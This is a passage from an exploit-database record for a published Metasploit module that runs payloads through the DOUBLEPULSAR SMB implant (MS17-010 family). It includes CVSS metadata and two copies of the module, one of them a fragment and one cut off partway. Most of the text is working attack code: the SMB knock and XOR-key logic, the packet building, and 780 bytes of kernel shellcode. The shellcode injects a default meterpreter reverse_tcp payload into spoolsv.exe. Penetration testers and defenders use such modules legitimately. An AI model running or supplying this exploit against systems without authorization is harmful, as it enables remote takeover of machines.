datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-05] #"}, "lastseen": "2021-11-04T22:17:15", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f7b4a950dfa38196577777902e8186fb", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-11-07T11:46:50", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0203", "CPAI-2017-0198", "CPAI-2017-0177"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-07T11:46:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-07T11:46:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n 